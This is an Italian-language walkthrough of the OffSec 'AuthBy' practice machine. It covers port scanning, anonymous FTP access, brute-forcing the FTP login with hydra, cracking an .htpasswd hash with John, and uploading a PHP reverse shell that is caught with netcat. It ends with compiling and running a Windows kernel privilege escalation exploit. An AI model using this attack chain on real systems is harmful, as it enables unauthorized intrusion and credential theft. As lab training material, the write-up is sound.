AuthBy
Network
- Ip Target:
192.168.166.46
Enumeration
| Port | Service | Version | Notes |
|---|---|---|---|
| 21/tcp | ftp | zFTPServer 6.0 build 2011-10-17 | zFTPServer |
| 242/tcp | direct | Apache httpd 2.2.21 | Apache |
| 3145/tcp | csi-lfap | zFTPServer | zFTPServer |
| 3389/tcp | ms-wbt-server | RDP |
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/AuthBy]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.166.46
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 19:34 CET
Nmap scan report for 192.168.166.46
Host is up (0.069s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
242/tcp open direct
3145/tcp open csi-lfap
3389/tcp open ms-wbt-server
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/AuthBy]
└─$ sudo nmap -Pn -sC -sV -p21,242,3145,3389 -oN alltcp.txt 192.168.166.46
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 19:38 CET
Nmap scan report for 192.168.166.46
Host is up (0.070s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
| ---------- 1 root root 25 Feb 10 2011 UninstallService.bat
| ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
| ---------- 1 root root 17 Aug 13 2011 StopService.bat
| ---------- 1 root root 18 Aug 13 2011 StartService.bat
| ---------- 1 root root 8736 Nov 09 2011 Settings.ini
| dr-xr-xr-x 1 root root 512 Dec 28 02:38 log
| ---------- 1 root root 2275 Aug 09 2011 LICENSE.htm
| ---------- 1 root root 23 Feb 10 2011 InstallService.bat
| dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
| dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
|_dr-xr-xr-x 1 root root 512 Aug 03 04:34 accounts
242/tcp open http Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
3145/tcp open zftp-admin zFTPServer admin
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2024-08-01T20:34:50
|_Not valid after: 2025-01-31T20:34:50
| rdp-ntlm-info:
| Target_Name: LIVDA
| NetBIOS_Domain_Name: LIVDA
| NetBIOS_Computer_Name: LIVDA
| DNS_Domain_Name: LIVDA
| DNS_Computer_Name: LIVDA
| Product_Version: 6.0.6001
|_ System_Time: 2024-12-27T18:38:27+00:00
|_ssl-date: 2024-12-27T18:38:41+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/AuthBy]
└─$ ftp 192.168.166.46
Connected to 192.168.166.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.166.46:momphucker): anonymous
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2133|)
150 Opening connection for /bin/ls.
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Dec 28 02:38 log
---------- 1 root root 2275 Aug 09 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Aug 03 04:34 accounts
226 Closing data connection.
ftp> cd accounts
250 CWD Command successful.
ftp> ls
229 Entering Extended Passive Mode (|||2134|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Aug 03 04:34 backup
---------- 1 root root 764 Aug 03 04:34 acc[Offsec].uac
---------- 1 root root 1032 Dec 28 05:11 acc[anonymous].uac
---------- 1 root root 926 Aug 03 04:34 acc[admin].uac
226 Closing data connection.
ftp> cd backup
250 CWD Command successful.
ftp> ls
229 Entering Extended Passive Mode (|||2135|)
150 Opening connection for /bin/ls.
total 4
---------- 1 root root 764 Jul 10 2020 acc[Offsec].uac
---------- 1 root root 1030 Jul 10 2020 acc[anonymous].uac
---------- 1 root root 926 Jul 10 2020 acc[admin].uac
226 Closing data connection.
ftp>
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/AuthBy]
└─$ hydra -I -V -f -L users.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt -t 32 192.168.166.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-27 22:25:50
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 32 tasks per 1 server, overall 32 tasks, 2000000 login tries (l:2/p:1000000), ~62500 tries per task
[DATA] attacking ftp://192.168.166.46:21/
[ATTEMPT] target 192.168.166.46 - login "Admin" - pass "123456" - 1 of 2000000 [child 0] (0/0)
[ATTEMPT] target 192.168.166.46 - login "Admin" - pass "password" - 2 of 2000000 [child 1] (0/0)
[...]
[ATTEMPT] target 192.168.166.46 - login "Admin" - pass "bigman" - 1032 of 2000000 [child 2] (0/0)
[21][ftp] host: 192.168.166.46 login: Admin password: admin
[STATUS] attack finished for 192.168.166.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-27 22:26:24
Credenziali FTP trovate: Admin:admin
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/AuthBy/ftp_admin]
└─$ ftp 192.168.166.46
Connected to 192.168.166.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.166.46:momphucker): admin
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2138|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
ftp>
Il contenuto dei files:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/AuthBy/ftp_admin]
└─$ cat .htaccess
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/AuthBy/ftp_admin]
└─$ cat .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/AuthBy/ftp_admin]
└─$ cat index.php
<center><pre>Qui e nuce nuculeum esse volt, frangit nucem!</pre></center>
Eseguo John The Ripper per decodificare l'hash della password:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/AuthBy/ftp_admin]
└─$ john --wordlist=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt hashes.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 ASIMD 4x2])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elite (offsec)
1g 0:00:00:00 DONE (2024-12-27 22:49) 25.00g/s 128000p/s 128000c/s 128000C/s ABC123..allan
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Credenziali trovate per la basic auth: offsec:elite
Port 242
Exploit
- Accedo alla pagina proteta dalla basic auth con
offsec:elite:
- Carico tramite
ftpuna reverse shell php, nello specifico la versione Ivan Sincek presa da revshells.com:
Bash
ftp> put php_reverse_shell2.php
local: php_reverse_shell2.php remote: php_reverse_shell2.php
229 Entering Extended Passive Mode (|||2157|)
150 File status okay; about to open data connection.
100% |***************************************************************************************************************| 9286 22.76 MiB/s 00:00 ETA
226 Closing data connection.
9286 bytes sent in 00:00 (60.78 KiB/s)
ftp>
Apro un listener sulla porta 80 e chiamo la reverse shell dal browser:
e si apre la shell sul listener:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/AuthBy/ftp_admin]
└─$ sudo nc -nvlp 80
[sudo] password for momphucker:
listening on [any] 80 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.166.46] 49161
SOCKET: Shell has connected! PID: 3272
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\Apache2.2.21>whoami
livda\apache
Recupero la flag local.txt:
Privilege Escalation
Non è possibile eseguire winpeas, non viene rilasciato alcun tipo di output. Verifico i privilegi dell'utente:
Text Only
C:\wamp\www>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
````
Nonostante il privilegio `SeImpersonatePrivilege` non riesco a usare `PrintSpoofer`, `GodPotato` ecc.
Verifico le info di sistema:
```powershell
C:\wamp\www>systeminfo
Host Name: LIVDA
OS Name: Microsoftr Windows Serverr 2008 Standard
OS Version: 6.0.6001 Service Pack 1 Build 6001
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 92573-OEM-7502905-27565
Original Install Date: 12/19/2009, 11:25:57 AM
System Boot Time: 12/27/2024, 10:29:49 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,644 MB
Page File: Max Size: 1,985 MB
Page File: Available: 1,532 MB
Page File: In Use: 453 MB
Page File Location(s): N/A
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): N/A
Cerco su Google windows server 2008 standard 6001 privilege escalation e trovo l'exploit 40564 su exploit-db.com.
Lo scarico sulla macchina e lo compilo:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/AuthBy/ftp_admin]
└─$ searchsploit -m 40564
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/AuthBy/ftp_admin]
└─$ i686-w64-mingw32-gcc 40564.c -o pwn.exe -lws2_32
Carico il file pwn.exe generato sulla macchina target tramite ftp e lo eseguo:
Catturo la flag proof.txt:
